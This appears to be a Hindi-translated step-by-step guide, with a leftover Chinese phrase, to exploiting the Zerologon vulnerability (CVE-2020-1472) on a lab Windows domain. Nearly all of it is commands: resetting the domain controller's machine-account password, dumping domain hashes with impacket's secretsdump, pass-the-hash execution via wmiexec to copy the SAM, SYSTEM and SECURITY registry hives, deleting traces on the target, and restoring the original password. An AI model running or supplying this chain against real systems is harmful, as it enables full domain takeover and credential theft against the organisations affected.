
CVE-2020-1472 (Zerologon) के लिए शोषण जो डोमेन कंट्रोलर मशीन खाता पासवर्ड रीसेट करता है, क्रेडेंशियल डंपिंग और डोमेन व्यवस्थापक के लिए विशेषाधिकार वृद्धि सक्षम करता है।
@toc
सिद्धांत काफी जटिल है, रुचि होने पर नीचे दिए गए लिंक पर लेख देख सकते हैं: https://www.freebuf.com/articles/system/249860.html
स्थानीय मशीन पर nrpc फ़ाइल को बदलने के लिए https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py फ़ाइल का उपयोग करना आवश्यक है। स्थानीय nrpc फ़ाइल का संग्रहण पथ है: C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py
python cve-2020-1472-exploit.py 机器账户名 ip
और यह पाया गया कि मशीन खाते का पासवर्ड पहले ही खाली कर दिया गया है, 31dc... खाली पासवर्ड दर्शाता है।

दूसरे पक्ष का मशीन खाता या netbios नाम प्राप्त करने के तरीके:
- net view
इस सर्वर नाम में $ जोड़ने पर यह मशीन नाम बन जाता है, उदाहरण के लिए lisi$ या yukong$।
- nbtstat -A ip
डोमेन कंट्रोलर का IP निर्धारित करने की कई विधियाँ हैं, उदाहरण के लिए:
- पोर्ट 53 खुला रखने वाले होस्ट को देखें
- net time के आउटपुट से डोमेन कंट्रोलर का होस्टनाम मिलेगा, फिर ping करें
- systeminfo कमांड से डोमेन वाले भाग का मान देखें, ping करते ही डोमेन कंट्रोलर का IP मिल जाएगा
- अपने होस्ट का DNS देखें
python secretsdump.py test.com/[email protected] -no-pass
यह पाया गया कि इस समय खाली पासवर्ड वाले मशीन खाते का उपयोग करके डोमेन कंट्रोलर पर मौजूद उपयोगकर्ता हैश पढ़े जा सकते हैं।
python wmiexec.py -hashes :3dbde697d71690a769204beb12283678 test/[email protected] reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save
get system.save get sam.save get security.save
del /f system.save del /f sam.save del /f security.save
exit
निष्पादन पूरा होने के बाद wmiexec स्क्रिप्ट वाले फ़ोल्डर में डाउनलोड की गई फ़ाइलें मिल सकती हैं:

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 test.com/[email protected] -use-vss यह कमांड निष्पादित होने में विफल रहा
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
लाल घेरे में दिख रहे पासवर्ड को सहेजें, यही पुराना मशीन पासवर्ड है, अर्थात aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a।
python reinstall_original_pw.py yukong$ 192.168.124.142 999699ceadecae87fef9a2040ef2213a

python secretsdump.py test.com/administrator:[email protected] -just-dc-user yukong$
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678 test/[email protected] -just-dc-user yukong$
पुनर्स्थापना सफल पाई गई।